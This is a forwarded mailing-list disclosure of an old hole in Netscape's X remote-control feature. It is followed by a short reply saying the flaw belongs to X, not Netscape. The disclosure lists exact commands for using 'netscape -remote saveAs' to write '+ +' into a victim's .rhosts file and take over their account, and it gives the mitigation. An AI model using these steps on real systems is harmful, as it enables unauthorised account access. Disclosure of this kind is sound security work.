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Re: Netscape hole without .Xauthority (fwd)

	That's called an X hole, not a netscape hole.

> Haven't seen this on the cypherpunks yet, sorry if this has been here=20
> already.=20
> Juri
> <o       J=FCri Kaljundi          e-mail: jk@digit.ee         o<
>  >o                             tel: +372 6308994            o>
> <o       DigiTurg               http://www.digit.ee/        o<
> ---------- Forwarded message ----------
> There's a huge hole in the Netscape remote control mechanism for the
> X-Windows based clients.=20
> Potential impact : anybody can become any user that uses Netscape on any
> system without sufficient X security.
> Let's suppose that you have an account on a target machine, where somebody
> is using Netscape, and either the xhost checking is disabled, or you can
> set the xhost yourself (e.g. if you have an account and the target user has
> no .Xauthority, as is frequent in university computer rooms).
> Then you can gain access to the target user's account using the following
> steps :
> - make a text file containing only "+ +" accessible (as file, as URL, or
>   whatever you like) to the target Netscape client. This is quite easy, eit=
> her
>   if you have a personal WWW page (http://... URL) or an account on the
>   target machine (file://... URL), or even by uploading it to an anon FTP
> - set your DISPLAY environment variable to the target display
> - run the following set of commands :
>   netscape -noraise -remote "openURL(<put-your-URL-here>)"
>   netscape -noraise -remote "saveAs(.rhosts)"
>   netscape -noraise -remote back
> In the second command, the path should be specified whenever possible=20
> (~ is not accepted).
> If the target user does not already have a .rhosts and is not looking at th=
> at
> precise moment, then the chances are it worked !
> Solution to the problem : every user concerned should either create a=20
> Xauthority file, or stop using Netscape.
> =09MXK
> PS: WHY do they bother with PGP and RSA security when they keep such holes =
> ????
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